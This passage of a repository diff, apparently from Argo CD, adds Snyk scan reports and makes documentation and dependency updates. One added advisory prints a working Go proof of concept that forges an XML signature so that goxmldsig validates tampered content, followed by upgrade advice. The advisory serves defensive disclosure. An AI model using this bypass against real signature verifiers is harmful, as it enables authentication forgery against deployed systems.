+            root.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
+            root.SetText(&quot;Malicious Content&quot;)
+        
+            tlsCert := tls.Certificate{
+                Certificate: [][]byte{cert.Raw},
+                PrivateKey:  key,
+            }
+        
+            ks := dsig.TLSCertKeyStore(tlsCert)
+            signingCtx := dsig.NewDefaultSigningContext(ks)
+        
+            sig, err := signingCtx.ConstructSignature(root, true)
+            if err != nil {
+                panic(err)
+            }
+        
+            signedInfo := sig.FindElement(&quot;./SignedInfo&quot;)
+        
+            existingRef := signedInfo.FindElement(&quot;./Reference&quot;)
+            existingRef.CreateAttr(&quot;URI&quot;, &quot;#dummy&quot;)
+        
+            originalEl := etree.NewElement(&quot;Root&quot;)
+            originalEl.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
+            originalEl.SetText(&quot;Original Content&quot;)
+        
+            sig1, _ := signingCtx.ConstructSignature(originalEl, true)
+            ref1 := sig1.FindElement(&quot;./SignedInfo/Reference&quot;).Copy()
+        
+            signedInfo.InsertChildAt(existingRef.Index(), ref1)
+        
+            c14n := signingCtx.Canonicalizer
+        
+            detachedSI := signedInfo.Copy()
+            if detachedSI.SelectAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix) == nil {
+                detachedSI.CreateAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix, dsig.Namespace)
+            }
+        
+            canonicalBytes, err := c14n.Canonicalize(detachedSI)
+            if err != nil {
+                fmt.Println(&quot;c14n error:&quot;, err)
+                return
+            }
+        
+            hash := signingCtx.Hash.New()
+            hash.Write(canonicalBytes)
+            digest := hash.Sum(nil)
+        
+            rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
+            if err != nil {
+                panic(err)
+            }
+        
+            sigVal := sig.FindElement(&quot;./SignatureValue&quot;)
+            sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
+        
+            certStore := &amp;dsig.MemoryX509CertificateStore{
+                Roots: []*x509.Certificate{cert},
+            }
+            valCtx := dsig.NewDefaultValidationContext(certStore)
+        
+            root.AddChild(sig)
+        
+            doc.SetRoot(root)
+            str, _ := doc.WriteToString()
+            fmt.Println(&quot;XML:&quot;)
+            fmt.Println(str)
+        
+            validated, err := valCtx.Validate(root)
+            if err != nil {
+                fmt.Println(&quot;validation failed:&quot;, err)
+            } else {
+                fmt.Println(&quot;validation ok&quot;)
+                fmt.Println(&quot;validated text:&quot;, validated.Text())
+            }
+        }
+        </code></pre>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>github.com/russellhaering/goxmldsig</code> to version 1.6.0 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/russellhaering/goxmldsig/commit/db3d1e31f7535d7f5debb49851b9e9a2ff08b936">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-15692488">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
            <h2 class="card__title">Asymmetric Resource Consumption (Amplification)</h2>
--- a/docs/snyk/v3.3.4/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html
+++ b/docs/snyk/v3.3.4/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:31:14 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:35:47 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following path:</span>
--- a/docs/snyk/v3.3.4/public.ecr.aws_docker_library_redis_8.2.3-alpine.html
+++ b/docs/snyk/v3.3.4/public.ecr.aws_docker_library_redis_8.2.3-alpine.html
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:31:20 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:35:52 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following path:</span>
--- a/docs/snyk/v3.3.4/quay.io_argoproj_argocd_v3.3.4.html
+++ b/docs/snyk/v3.3.4/quay.io_argoproj_argocd_v3.3.4.html
--- a/docs/snyk/v3.4.0-rc2/argocd-iac-install.html
+++ b/docs/snyk/v3.4.0-rc2/argocd-iac-install.html
--- a/docs/snyk/v3.4.0-rc2/argocd-iac-namespace-install.html
+++ b/docs/snyk/v3.4.0-rc2/argocd-iac-namespace-install.html
--- a/docs/snyk/v3.4.0-rc2/argocd-test.html
+++ b/docs/snyk/v3.4.0-rc2/argocd-test.html
--- a/docs/snyk/v3.4.0-rc2/ghcr.io_dexidp_dex_v2.45.0.html
+++ b/docs/snyk/v3.4.0-rc2/ghcr.io_dexidp_dex_v2.45.0.html
--- a/docs/snyk/v3.4.0-rc2/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html
+++ b/docs/snyk/v3.4.0-rc2/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html
--- a/docs/snyk/v3.4.0-rc2/public.ecr.aws_docker_library_redis_8.2.3-alpine.html
+++ b/docs/snyk/v3.4.0-rc2/public.ecr.aws_docker_library_redis_8.2.3-alpine.html
@@ -0,0 +1,528 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+  <meta http-equiv="Content-type" content="text/html; charset=utf-8">
+  <meta http-equiv="Content-Language" content="en-us">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <meta http-equiv="X-UA-Compatible" content="IE=edge">
+  <title>Snyk test report</title>
+  <meta name="description" content="0 known vulnerabilities found in 0 vulnerable dependency paths.">
+  <base target="_blank">
+  <link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
+    sizes="194x194">
+  <link rel="shortcut icon" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.ico">
+  <style type="text/css">
+  
+    body {
+      -moz-font-feature-settings: "pnum";
+      -webkit-font-feature-settings: "pnum";
+      font-variant-numeric: proportional-nums;
+      display: flex;
+      flex-direction: column;
+      font-feature-settings: "pnum";
+      font-size: 100%;
+      line-height: 1.5;
+      min-height: 100vh;
+      -webkit-text-size-adjust: 100%;
+      margin: 0;
+      padding: 0;
+      background-color: #F5F5F5;
+      font-family: 'Arial', 'Helvetica', Calibri, sans-serif;
+    }
+  
+    h1,
+    h2,
+    h3,
+    h4,
+    h5,
+    h6 {
+      font-weight: 500;
+    }
+  
+    a,
+    a:link,
+    a:visited {
+      border-bottom: 1px solid #4b45a9;
+      text-decoration: none;
+      color: #4b45a9;
+    }
+  
+    a:hover,
+    a:focus,
+    a:active {
+      border-bottom: 1px solid #4b45a9;
+    }
+  
+    hr {
+      border: none;
+      margin: 1em 0;
+      border-top: 1px solid #c5c5c5;
+    }
+  
+    ul {
+      padding: 0 1em;
+      margin: 1em 0;
+    }
+  
+    code {
+      background-color: #EEE;
+      color: #333;
+      padding: 0.25em 0.5em;
+      border-radius: 0.25em;
+    }
+  
+    pre {
+      background-color: #333;
+      font-family: monospace;
+      padding: 0.5em 1em 0.75em;
+      border-radius: 0.25em;
+      font-size: 14px;
+    }
+  
+    pre code {
+      padding: 0;
+      background-color: transparent;
+      color: #fff;
+    }
+  
+    a code {
+      border-radius: .125rem .125rem 0 0;
+      padding-bottom: 0;
+      color: #4b45a9;
+    }
+  
+    a[href^="http://"]:after,
+    a[href^="https://"]:after {
+      background-image: linear-gradient(transparent,transparent),url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20112%20109%22%3E%3Cg%20id%3D%22Page-1%22%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%3Cg%20id%3D%22link-external%22%3E%3Cg%20id%3D%22arrow%22%3E%3Cpath%20id%3D%22Line%22%20stroke%3D%22%234B45A9%22%20stroke-width%3D%2215%22%20d%3D%22M88.5%2021l-43%2042.5%22%20stroke-linecap%3D%22square%22%2F%3E%3Cpath%20id%3D%22Triangle%22%20fill%3D%22%234B45A9%22%20d%3D%22M111.2%200v50L61%200z%22%2F%3E%3C%2Fg%3E%3Cpath%20id%3D%22square%22%20fill%3D%22%234B45A9%22%20d%3D%22M66%2015H0v94h94V44L79%2059v35H15V30h36z%22%2F%3E%3C%2Fg%3E%3C%2Fg%3E%3C%2Fsvg%3E");
+      background-repeat: no-repeat;
+      background-size: .75rem;
+      content: "";
+      display: inline-block;
+      height: .75rem;
+      margin-left: .25rem;
+      width: .75rem;
+    }
+  
+  
+  /* Layout */
+  
+    [class*=layout-container] {
+      margin: 0 auto;
+      max-width: 71.25em;
+      padding: 1.9em 1.3em;
+      position: relative;
+    }
+    .layout-container--short {
+      padding-top: 0;
+      padding-bottom: 0;
+      max-width: 48.75em;
+    }
+  
+    .layout-container--short:after {
+      display: block;
+      content: "";
+      clear: both;
+    }
+  
+  /* Header */
+  
+    .header {
+      padding-bottom: 1px;
+    }
+  
+    .paths {
+      margin-left: 8px;
+    }
+    .header-wrap {
+      display: flex;
+      flex-direction: row;
+      justify-content: space-between;
+      padding-top: 2em;
+    }
+    .project__header {
+      background-color: #030328;
+      color: #fff;
+      margin-bottom: -1px;
+      padding-top: 1em;
+      padding-bottom: 0.25em;
+      border-bottom: 2px solid #BBB;
+    }
+  
+    .project__header__title {
+      overflow-wrap: break-word;
+      word-wrap: break-word;
+      word-break: break-all;
+      margin-bottom: .1em;
+      margin-top: 0;
+    }
+  
+    .timestamp {
+      float: right;
+      clear: none;
+      margin-bottom: 0;
+    }
+  
+    .meta-counts {
+      clear: both;
+      display: block;
+      flex-wrap: wrap;
+      justify-content: space-between;
+      margin: 0 0 1.5em;
+      color: #fff;
+      clear: both;
+      font-size: 1.1em;
+    }
+  
+    .meta-count {
+      display: block;
+      flex-basis: 100%;
+      margin: 0 1em 1em 0;
+      float: left;
+      padding-right: 1em;
+      border-right: 2px solid #fff;
+    }
+  
+    .meta-count:last-child {
+      border-right: 0;
+      padding-right: 0;
+      margin-right: 0;
+    }
+  
+  /* Card */
+  
+    .card {
+      background-color: #fff;
+      border: 1px solid #c5c5c5;
+      border-radius: .25rem;
+      margin: 0 0 2em 0;
+      position: relative;
+      min-height: 40px;
+      padding: 1.5em;
+    }
+  
+    .card__labels {
+      position: absolute;
+      top: 1.1em;
+      left: 0;
+      display: flex;
+      align-items: center;
+      gap: 8px;
+    }
+  
+    .card .label {
+      background-color: #767676;
+      border: 2px solid #767676;
+      color: white;
+      padding: 0.25rem 0.75rem;
+      font-size: 0.875rem;
+      text-transform: uppercase;
+      display: inline-block;
+      margin: 0;
+      border-radius: 0.25rem;
+    }
+  
+    .card .label__text {
+      vertical-align: text-top;
+        font-weight: bold;
+    }
+  
+    .card .label--critical {
+      background-color: #AB1A1A;
+      border-color: #AB1A1A;
+    }
+  
+    .card .label--high {
+      background-color: #CE5019;
+      border-color: #CE5019;
+    }
+  
+    .card .label--medium {
+      background-color: #D68000;
+      border-color: #D68000;
+    }
+  
+    .card .label--low {
+      background-color: #88879E;
+      border-color: #88879E;
+    }
+  
+    .card .label--exploit {
+      background-color: #8B5A96;
+      border-color: #8B5A96;
+    }
+  
+    .severity--low {
+      border-color: #88879E;
+    }
+  
+    .severity--medium {
+      border-color: #D68000;
+    }
+  
+    .severity--high {
+      border-color: #CE5019;
+    }
+  
+    .severity--critical {
+      border-color: #AB1A1A;
+    }
+  
+    .card--vuln {
+      padding-top: 4em;
+    }
+  
+    .card--vuln .card__labels > .label:first-child {
+      padding-left: 1.9em;
+      padding-right: 1.9em;
+      border-radius: 0 0.25rem 0.25rem 0;
+    }
+  
+    .card--vuln .card__section h2 {
+      font-size: 22px;
+      margin-bottom: 0.5em;
+    }
+  
+    .card--vuln .card__section p {
+      margin: 0 0 0.5em 0;
+    }
+  
+    .card--vuln .card__meta {
+      padding: 0 0 0 1em;
+      margin: 0;
+      font-size: 1.1em;
+    }
+  
+    .card .card__meta__paths {
+      font-size: 0.9em;
+    }
+  
+    .card--vuln .card__title {
+      font-size: 28px;
+      margin-top: 0;
+      margin-right: 100px; /* Ensure space for the risk score */
+    }
+  
+    .card--vuln .card__cta p {
+      margin: 0;
+      text-align: right;
+    }
+  
+    .risk-score-display {
+      position: absolute;
+      top: 1.5em;
+      right: 1.5em;
+      text-align: right;
+      z-index: 10;
+    }
+  
+    .risk-score-display__label {
+      font-size: 0.7em;
+      font-weight: bold;
+      color: #586069;
+      text-transform: uppercase;
+      line-height: 1;
+      margin-bottom: 3px;
+    }
+  
+    .risk-score-display__value {
+      font-size: 1.9em;
+      font-weight: 600;
+      color: #24292e;
+      line-height: 1;
+    }
+  
+    .source-panel {
+      clear: both;
+      display: flex;
+      justify-content: flex-start;
+      flex-direction: column;
+      align-items: flex-start;
+      padding: 0.5em 0;
+      width: fit-content;
+    }
+  
+  
+  
+  </style>
+  <style type="text/css">
+    .metatable {
+      text-size-adjust: 100%;
+      -webkit-font-smoothing: antialiased;
+      -webkit-box-direction: normal;
+      color: inherit;
+      font-feature-settings: "pnum";
+      box-sizing: border-box;
+      background: transparent;
+      border: 0;
+      font: inherit;
+      font-size: 100%;
+      margin: 0;
+      outline: none;
+      padding: 0;
+      text-align: left;
+      text-decoration: none;
+      vertical-align: baseline;
+      z-index: auto;
+      margin-top: 12px;
+      border-collapse: collapse;
+      border-spacing: 0;
+      font-variant-numeric: tabular-nums;
+      max-width: 51.75em;
+    }
+  
+    tbody {
+      text-size-adjust: 100%;
+      -webkit-font-smoothing: antialiased;
+      -webkit-box-direction: normal;
+      color: inherit;
+      font-feature-settings: "pnum";
+      border-collapse: collapse;
+      border-spacing: 0;
+      box-sizing: border-box;
+      background: transparent;
+      border: 0;
+      font: inherit;
+      font-size: 100%;
+      margin: 0;
+      outline: none;
+      padding: 0;
+      text-align: left;
+      text-decoration: none;
+      vertical-align: baseline;
+      z-index: auto;
+      display: flex;
+      flex-wrap: wrap;
+    }
+  
+    .meta-row {
+      text-size-adjust: 100%;
+      -webkit-font-smoothing: antialiased;
+      -webkit-box-direction: normal;
+      color: inherit;
+      font-feature-settings: "pnum";
+      border-collapse: collapse;
+      border-spacing: 0;
+      box-sizing: border-box;
+      background: transparent;
+      border: 0;
+      font: inherit;
+      font-size: 100%;
+      outline: none;
+      text-align: left;
+      text-decoration: none;
+      vertical-align: baseline;
+      z-index: auto;
+      display: flex;
+      align-items: start;
+      border-top: 1px solid #d3d3d9;
+      padding: 8px 0 0 0;
+      border-bottom: none;
+      margin: 8px;
+      width: 47.75%;
+    }
+  
+    .meta-row-label {
+      text-size-adjust: 100%;
+      -webkit-font-smoothing: antialiased;
+      -webkit-box-direction: normal;
+      font-feature-settings: "pnum";
+      border-collapse: collapse;
+      border-spacing: 0;
+      color: #4c4a73;
+      box-sizing: border-box;
+      background: transparent;
+      border: 0;
+      font: inherit;
+      margin: 0;
+      outline: none;
+      text-decoration: none;
+      z-index: auto;
+      align-self: start;
+      flex: 1;
+      font-size: 1rem;
+      line-height: 1.5rem;
+      padding: 0;
+      text-align: left;
+      vertical-align: top;
+      text-transform: none;
+      letter-spacing: 0;
+    }
+  
+    .meta-row-value {
+      text-size-adjust: 100%;
+      -webkit-font-smoothing: antialiased;
+      -webkit-box-direction: normal;
+      color: inherit;
+      font-feature-settings: "pnum";
+      border-collapse: collapse;
+      border-spacing: 0;
+      word-break: break-word;
+      box-sizing: border-box;
+      background: transparent;
+      border: 0;
+      font: inherit;
+      font-size: 100%;
+      margin: 0;
+      outline: none;
+      padding: 0;
+      text-align: right;
+      text-decoration: none;
+      vertical-align: baseline;
+      z-index: auto;
+    }
+  </style>
+</head>
+
+<body class="section-projects">
+  <main class="layout-stacked">
+        <div class="layout-stacked__header header">
+          <header class="project__header">
+            <div class="layout-container">
+              <a class="brand" href="https://snyk.io" title="Snyk">
+                <svg width="68px" height="35px" viewBox="0 0 68 35" version="1.1" xmlns="http://www.w3.org/2000/svg" role="img">
+                  <title>Snyk - Open Source Security</title>
+                  <g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
+                    <g fill="#fff">
+                      <path d="M5.732,27.278 C3.445,27.278 1.589,26.885 0,26.124 L0.483,22.472 C2.163,23.296 4.056,23.689 5.643,23.689 C6.801,23.689 7.563,23.295 7.563,22.599 C7.563,20.594 0.333,21.076 0.333,15.839 C0.333,12.491 3.407,10.729 7.259,10.729 C9.179,10.729 11.161,11.249 12.444,11.704 L11.924,15.294 C10.577,14.774 8.747,14.291 7.222,14.291 C6.282,14.291 5.518,14.621 5.518,15.231 C5.518,17.208 12.903,16.815 12.903,21.925 C12.903,25.325 9.877,27.277 5.733,27.277 L5.732,27.278 Z M25.726,26.936 L25.726,17.894 C25.726,15.827 24.811,14.85 23.069,14.85 C22.219,14.85 21.329,15.09 20.719,15.46 L20.719,26.936 L15.352,26.936 L15.352,11.262 L20.602,10.83 L20.474,13.392 L20.652,13.392 C21.784,11.87 23.702,10.716 25.992,10.716 C28.736,10.716 31.112,12.416 31.112,16.436 L31.112,26.936 L25.724,26.936 L25.726,26.936 Z M61.175,26.936 L56.879,19.479 L56.446,19.479 L56.446,26.935 L51.082,26.935 L51.082,8.37 L56.447,0 L56.447,17.323 C57.515,16.017 61.112,11.059 61.112,11.059 L67.732,11.059 L61.454,17.689 L67.949,26.95 L61.175,26.95 L61.175,26.938 L61.175,26.936 Z M44.13,11.11 L41.93,18.262 C41.5,19.606 41.08,22.079 41.08,22.079 C41.08,22.079 40.75,19.516 40.292,18.172 L37.94,11.108 L31.928,11.108 L38.462,26.935 C37.572,29.04 36.199,30.815 34.369,30.815 C34.039,30.815 33.709,30.802 33.389,30.765 L31.255,34.061 C31.928,34.441 33.212,34.835 34.737,34.835 C38.703,34.835 41.359,31.627 43.215,26.885 L49.443,11.108 L44.132,11.108 L44.13,11.11 Z"></path>
+                    </g>
+                  </g>
+                </svg>
+              </a>
+              <div class="header-wrap">
+                  <h1 class="project__header__title">Snyk test report</h1>
+    
+                <p class="timestamp">March 22nd 2026, 12:33:06 am (UTC+00:00)</p>
+              </div>
+              <div class="source-panel">
+                <span>Scanned the following path:</span>
+                <ul>
+                  <li class="paths">public.ecr.aws/docker/library/redis:8.2.3-alpine/docker/library/redis (apk)</li>
+                </ul>
+              </div>
+    
+              <div class="meta-counts">
+                <div class="meta-count"><span>0</span> <span>known vulnerabilities</span></div>
+                <div class="meta-count"><span>0 vulnerable dependency paths</span></div>
+                <div class="meta-count"><span>22</span> <span>dependencies</span></div>
+              </div><!-- .meta-counts -->
+            </div><!-- .layout-container--short -->
+          </header><!-- .project__header -->
+        </div><!-- .layout-stacked__header -->
+      <section class="layout-container">
+          <table class="metatable">
+              <tbody>
+              <tr class="meta-row"><th class="meta-row-label">Project</th> <td class="meta-row-value">docker-image|public.ecr.aws/docker/library/redis</td></tr>
+              <tr class="meta-row"><th class="meta-row-label">Path</th> <td class="meta-row-value">public.ecr.aws/docker/library/redis:8.2.3-alpine/docker/library/redis</td></tr>
+              <tr class="meta-row"><th class="meta-row-label">Package Manager</th> <td class="meta-row-value">apk</td></tr>
+              
+              </tbody>
+          </table>
+      </section>
+    <div class="layout-container" style="padding-top: 35px;">
+      No known vulnerabilities detected.
+    </div>
+  </main><!-- .layout-stacked__content -->
+</body>
+
+</html>
--- a/docs/snyk/v3.4.0-rc2/quay.io_argoproj_argocd_v3.4.0-rc2.html
+++ b/docs/snyk/v3.4.0-rc2/quay.io_argoproj_argocd_v3.4.0-rc2.html
--- a/docs/user-guide/orphaned-resources.md
+++ b/docs/user-guide/orphaned-resources.md
@@ -1,5 +1,9 @@
 # Orphaned Resources Monitoring

+!!! warning
+
+    Enabling orphaned resource monitoring has performance implications. If an AppProject monitors a namespace containing many resources not managed by Argo CD (e.g. `kube-system`), it can significantly impact your Argo CD instance. Enable this feature only on projects with well-scoped namespaces.
+
 An [orphaned Kubernetes resource](https://kubernetes.io/docs/concepts/architecture/garbage-collection/#orphaned-dependents) is a top-level namespaced resource that does not belong to any Argo CD Application. The Orphaned Resources Monitoring feature allows detecting
 orphaned resources, inspecting/removing resources using the Argo CD UI, and generating a warning.

@@ -38,10 +42,10 @@ Not every resource in the Kubernetes cluster is controlled by the end user and m

 The following resources are never considered orphaned:

-* Namespaced resources denied in the project. Usually, such resources are managed by cluster administrators and are not supposed to be modified by a namespace user.
-* `ServiceAccount` with the name `default` (and the corresponding auto-generated `ServiceAccountToken`).
-* `Service` with the name `kubernetes` in the `default` namespace.
-* `ConfigMap` with the name `kube-root-ca.crt` in all namespaces.
+- Namespaced resources denied in the project. Usually, such resources are managed by cluster administrators and are not supposed to be modified by a namespace user.
+- `ServiceAccount` with the name `default` (and the corresponding auto-generated `ServiceAccountToken`).
+- `Service` with the name `kubernetes` in the `default` namespace.
+- `ConfigMap` with the name `kube-root-ca.crt` in all namespaces.

 You can prevent resources from being declared orphaned by providing a list of ignore rules, each defining a Group, Kind, and Name.

@@ -49,8 +53,8 @@ You can prevent resources from being declared orphaned by providing a list of ig
 spec:
  orphanedResources:
    ignore:
-    - kind: ConfigMap
-      name: orphaned-but-ignored-configmap
+      - kind: ConfigMap
+        name: orphaned-but-ignored-configmap
 ```

 The `name` can be a [glob pattern](https://github.com/gobwas/glob), e.g.:
--- a/docs/user-guide/source-hydrator.md
+++ b/docs/user-guide/source-hydrator.md
@@ -87,7 +87,7 @@ stringData:

 The only difference between the secrets above, besides the resource name, is that the push secret contains the label
 `argocd.argoproj.io/secret-type: repository-write`, which causes the Secret to be used for pushing manifests to git
-instead of pulling from git. Argo CD requires different secrets for pushing and pulling to provide better isolation.
+instead of pulling from Git. Argo CD requires different secrets for pushing and pulling to provide better isolation.

 Once your secrets are installed, set the `spec.sourceHydrator` field of the Application. For example:

@@ -113,7 +113,7 @@ This can be a Helm chart, a Kustomize directory, or plain manifests. Argo CD rea
 manifests from it, and then writes those hydrated manifests into the location specified by `syncSource.path`.

 When using source hydration, the `syncSource.path` field is required and must always point to a non-root
-directory in the repository. Setting the path to the repository root (for eg. `"."` or `""`) is not
+directory in the repository. Setting the path to the repository root (for example `"."` or `""`) is not
 supported. This ensures that hydration is always scoped to a dedicated subdirectory, which avoids unintentionally overwriting or removing files that may exist in the repository root.

 During each hydration run, Argo CD cleans the application's configured path before writing out newly generated manifests. This guarantees that old or stale files from previous hydration do not linger in the output directory. However, the repository root is never cleaned, so files such as CI/CD configuration, README files, or other root-level assets remain untouched.
@@ -248,7 +248,7 @@ spec:

 The source hydrator can be used to push hydrated manifests to a "staging" branch instead of the `syncSource` branch.
 This provides a way to prevent the hydrated manifests from being applied to the cluster until some prerequisite
-conditions are met (in effect providing a way to handle environment promotion via Pull Requests).
+conditions are met (in effect, providing a way to handle environment promotion via Pull Requests).

 To use the source hydrator to push to a "staging" branch, set the `spec.sourceHydrator.hydrateTo` field of the
 Application. For example:
@@ -350,7 +350,7 @@ git commit -m "Bump image to v1.2.3" \
  --trailer "Argocd-reference-commit-date: $date"
 ```

-The commit metadata will appear in the hydrated commit's root hydrator.metadata file:
+The commit metadata will appear in the hydrated commit's root `hydrator.metadata` file:

 ```json
 {
@@ -391,7 +391,7 @@ All trailers are optional. If a trailer is not specified, the corresponding fiel

 The commit message is generated using a [Go text/template](https://pkg.go.dev/text/template), optionally configured by the user via the argocd-cm ConfigMap. The template is rendered using the values from `hydrator.metadata`. The template can be multi-line, allowing users to define a subject line, body and optional trailers. To define the commit message template, you need to set the `sourceHydrator.commitMessageTemplate` field in argocd-cm ConfigMap.

-The template may functions from the [Sprig function library](https://github.com/Masterminds/sprig).
+The template can invoke functions from the [Sprig function library](https://github.com/Masterminds/sprig).

 ```yaml
 apiVersion: v1
@@ -432,15 +432,15 @@ data:
 ```

 **Configuration Keys:**
- `commit.author.name`: The git commit author name (defaults to `"Argo CD"` if not set)
- `commit.author.email`: The git commit author email (defaults to `"argo-cd@example.com"` if not set)
+* `commit.author.name`: The git commit author name (defaults to `"Argo CD"` if not set)
+* `commit.author.email`: The git commit author email (defaults to `"argo-cd@example.com"` if not set)

 Both values are optional. If only one is configured, the configured value will be used and the other will use its default.

 ### Credential Templates

 Credential templates allow a single credential to be used for multiple repositories. The source hydrator supports credential templates. For example, if you setup credential templates for the URL prefix `https://github.com/argoproj`, these credentials will be used for all repositories with this URL as prefix (e.g. `https://github.com/argoproj/argocd-example-apps`) that do not have their own credentials configured.
-For more information please refer [credential-template](private-repositories.md#credential-templates). 
+For more information, please refer to [Credential templates](private-repositories.md#credential-templates).
 An example of repo-write-creds secret.

 ```yaml
@@ -463,9 +463,9 @@ stringData:
 The Source Hydrator does not create a new hydrated commit for a DRY commit if the commit doesn't affect the hydrated manifests. Instead, the hydration state (the DRY SHA last hydrated) is tracked using a [git note](https://git-scm.com/docs/git-notes) in a dedicated `source-hydrator` namespace.

 On each run, the hydrator:
- Checks the git note for the last hydrated DRY SHA.
- If manifests have not changed since that SHA, only updates the note.
- If manifests have changed, commits the new manifests and updates the note as well.
+* Checks the git note for the last hydrated DRY SHA.
+* If manifests have not changed since that SHA, only updates the note.
+* If manifests have changed, commits the new manifests and updates the note as well.

 This improves efficiency and reduces commit noise in your repository.

@@ -507,8 +507,8 @@ secrets operator that populates the secret values on the destination cluster.
 ### Make Hydration Deterministic

 The source hydrator should be deterministic. For a given dry source commit, the hydrator should always produce the same
-hydrated manifests. This means that the hydrator should not rely on external state or configuration that is not stored
-in git.
+hydrated manifests. This means that the hydrator should not rely on an external state or configuration that is not stored
+in Git.

 Examples of non-deterministic hydration:

@@ -533,4 +533,4 @@ to configure branch protection rules on the destination repository.

 ### Application Path Cleaning Behavior

-The Source Hydrator does not clean (remove) files from the application's configured output path before writing new manifests. This means that any files previously generated by hydration (or otherwise present) that are not overwritten by the new hydration run will remain in the output directory.
+The Source Hydrator does not clean (remove) files from the application's configured output path before writing new manifests. This means that any files previously generated by hydration (or otherwise present) that are not overwritten by the new hydration run will remain in the output directory.
--- a/gitops-engine/pkg/cache/mocks/ClusterCache.go
+++ b/gitops-engine/pkg/cache/mocks/ClusterCache.go
@@ -563,7 +563,7 @@ func (_c *ClusterCache_IsNamespaced_Call) RunAndReturn(run func(gk schema.GroupK
 	return _c
 }

-// IterateHierarchyV2 provides a mock function with given fields: keys, action, orphanedResourceNamespace
+// IterateHierarchyV2 provides a mock function for the type ClusterCache
 func (_mock *ClusterCache) IterateHierarchyV2(keys []kube.ResourceKey, action func(resource *cache.Resource, namespaceResources map[kube.ResourceKey]*cache.Resource) bool) {
 	_mock.Called(keys, action)
 	return
--- a/gitops-engine/pkg/utils/kube/resource_ops_test.go
+++ b/gitops-engine/pkg/utils/kube/resource_ops_test.go
@@ -57,14 +57,14 @@ func TestAuthReconcileWithMissingNamespace(t *testing.T) {

 	_, err := k.authReconcile(context.Background(), role, "/dev/null", cmdutil.DryRunNone)
 	assert.Error(t, err)
-	assert.True(t, errors.IsNotFound(err), "returned error wasn't not found")
+	assert.True(t, errors.IsNotFound(err), "returned error should be resource not found")

 	roleBinding := testingutils.NewRoleBinding()
 	roleBinding.SetNamespace(namespace)

 	_, err = k.authReconcile(context.Background(), roleBinding, "/dev/null", cmdutil.DryRunNone)
 	assert.Error(t, err)
-	assert.True(t, errors.IsNotFound(err), "returned error wasn't not found")
+	assert.True(t, errors.IsNotFound(err), "returned error should be resource not found")

 	clusterRole := testingutils.NewClusterRole()
 	clusterRole.SetNamespace(namespace)
--- a/go.mod
+++ b/go.mod
@@ -45,6 +45,7 @@ require (
 	github.com/gogits/go-gogs-client v0.0.0-20210131175652-1d7215cd8d85
 	github.com/gogo/protobuf v1.3.2
 	github.com/golang-jwt/jwt/v5 v5.3.1
+	github.com/golang/groupcache v0.0.0-20241129210726-2c02b8208cf8
 	github.com/golang/protobuf v1.5.4
 	github.com/google/btree v1.1.3
 	github.com/google/gnostic-models v0.7.0 // indirect
@@ -102,7 +103,7 @@ require (
 	golang.org/x/term v0.41.0
 	golang.org/x/time v0.15.0
 	google.golang.org/genproto/googleapis/api v0.0.0-20260209200024-4cfbd4190f57
-	google.golang.org/grpc v1.79.2
+	google.golang.org/grpc v1.79.3
 	google.golang.org/protobuf v1.36.11
 	gopkg.in/yaml.v2 v2.4.0
 	gopkg.in/yaml.v3 v3.0.1
@@ -148,18 +149,18 @@ require (
 	github.com/RocketChat/Rocket.Chat.Go.SDK v0.0.0-20240116134246-a8cbe886bab0 // indirect
 	github.com/aws/aws-sdk-go-v2 v1.41.4
 	github.com/aws/aws-sdk-go-v2/config v1.32.11
-	github.com/aws/aws-sdk-go-v2/credentials v1.19.11
-	github.com/aws/aws-sdk-go-v2/feature/ec2/imds v1.18.19 // indirect
+	github.com/aws/aws-sdk-go-v2/credentials v1.19.12
+	github.com/aws/aws-sdk-go-v2/feature/ec2/imds v1.18.20 // indirect
 	github.com/aws/aws-sdk-go-v2/internal/configsources v1.4.20 // indirect
 	github.com/aws/aws-sdk-go-v2/internal/endpoints/v2 v2.7.20 // indirect
 	github.com/aws/aws-sdk-go-v2/internal/ini v1.8.5 // indirect
-	github.com/aws/aws-sdk-go-v2/service/internal/accept-encoding v1.13.6 // indirect
-	github.com/aws/aws-sdk-go-v2/service/internal/presigned-url v1.13.19 // indirect
-	github.com/aws/aws-sdk-go-v2/service/signin v1.0.7 // indirect
+	github.com/aws/aws-sdk-go-v2/service/internal/accept-encoding v1.13.7 // indirect
+	github.com/aws/aws-sdk-go-v2/service/internal/presigned-url v1.13.20 // indirect
